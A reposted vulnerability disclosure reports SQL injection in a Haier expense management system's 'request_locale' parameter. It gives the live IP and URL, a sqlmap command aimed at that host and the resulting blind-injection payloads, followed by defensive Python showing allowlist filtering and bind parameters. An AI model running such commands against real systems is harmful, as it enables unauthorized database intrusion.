
SQL Injection Vulnerability in the Haier Group Expense Management System

程序员文章站 2022-04-07 09:53:15

# Vulnerable site: Haier Global Expense Management System

http://27.223.70.16:443/gems/security/loginInit.action

# Injection point

http://27.223.70.16:443/gems/security/loginInit.action?request_locale=en_US

# Injection parameter

request_locale

```
python sqlmap.py -u "http://27.223.70.16:443/gems/security/loginInit.action?request_locale=en_US'" --dbms oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: request_locale (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: request_locale=en_US' AND 1286=1286-- qGIA

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: request_locale=en_US' AND 2334=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(75)||CHR(116)||CHR(66),5)-- BIBG
---
[19:44:44] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
```

Solution:

Filter the input.
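
One way to apply the filtering advice to `request_locale`, shown beside the vulnerable pattern; this is an added example, not code from the original report or from the affected application. It assumes the back end looks up text by locale in a hypothetical `labels` table, uses `sqlite3` as a stand-in for Oracle, and assumes valid locales look like `en_US`.

```python
import re
import sqlite3

# Payload values copied from the sqlmap output above (the part after "request_locale=").
BOOLEAN_PAYLOAD = "en_US' AND 1286=1286-- qGIA"
TIME_PAYLOAD = ("en_US' AND 2334=DBMS_PIPE.RECEIVE_MESSAGE("
                "CHR(75)||CHR(75)||CHR(116)||CHR(66),5)-- BIBG")

# Assumption: the application only needs locales shaped like en_US or zh_CN.
LOCALE_RE = re.compile(r"[a-z]{2}_[A-Z]{2}")
DEFAULT_LOCALE = "en_US"


def safe_locale(raw):
    """Allowlist filter: return raw only if it is a well-formed locale."""
    if isinstance(raw, str) and LOCALE_RE.fullmatch(raw):
        return raw
    return DEFAULT_LOCALE


def make_db():
    """Constructed sample table; sqlite3 stands in for the Oracle back end."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE labels (locale TEXT, msg TEXT)")
    db.executemany("INSERT INTO labels VALUES (?, ?)",
                   [("en_US", "Login"), ("zh_CN", "登录")])
    return db


def labels_concat(db, locale):
    """Vulnerable pattern: the parameter is pasted into the SQL text."""
    sql = "SELECT msg FROM labels WHERE locale = '" + locale + "'"
    return [row[0] for row in db.execute(sql)]


def labels_bound(db, locale):
    """Hardened pattern: the value travels as a bind parameter, never as SQL."""
    sql = "SELECT msg FROM labels WHERE locale = ?"
    return [row[0] for row in db.execute(sql, (locale,))]


def handle_request(db, raw_locale):
    """Filter first, then query with a bind parameter."""
    return labels_bound(db, safe_locale(raw_locale))


if __name__ == "__main__":
    db = make_db()
    print(labels_concat(db, BOOLEAN_PAYLOAD))   # injected condition ran as SQL
    print(labels_bound(db, BOOLEAN_PAYLOAD))    # payload treated as plain data
    print(handle_request(db, TIME_PAYLOAD))     # filtered to the default locale
```

The allowlist rejects anything that is not a locale, and the bind parameter keeps the query safe even if the filter is later loosened.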